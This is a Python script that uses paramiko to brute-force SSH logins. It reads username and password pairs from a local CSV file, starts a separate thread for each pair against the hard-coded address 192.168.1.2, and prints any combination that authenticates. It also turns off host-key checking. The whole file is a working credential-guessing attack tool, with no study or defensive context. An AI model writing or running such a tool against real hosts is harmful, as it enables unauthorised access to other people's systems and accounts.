#!/usr/bin/python3.12

import csv
import ipaddress
import threading
import time
import logging
from logging import NullHandler
from paramiko import SSHClient, AutoAddPolicy, AuthenticationException, ssh_exception

def ssh_connect(host, username, password):
    ssh_client = SSHClient()
    ssh_client.set_missing_host_key_policy(AutoAddPolicy())
    try:
        ssh_client.connect(host,port=22,username=username, password=password, banner_timeout=300)
        print(f"Username - {username} and Password - {password} found.")
    except AuthenticationException:
        print(f"Username - {username} and Password - {password} is Incorrect.")
    except ssh_exception.SSHException:
        print("**** Attempting to connect - Rate limiting on server ****")        
        
def __main__():
    logging.getLogger('paramiko.transport').addHandler(NullHandler())
    list_file="/home/dkumar/Data/passwords.csv"
    host = "192.168.1.2"
    with open(list_file) as fh:
        csv_reader = csv.reader(fh, delimiter=",")
        for index, row in enumerate(csv_reader):
            t = threading.Thread(target=ssh_connect, args=(host, row[0], row[1],))
            t.start()
            #ssh_connect(host, row[0], row[1])

__main__()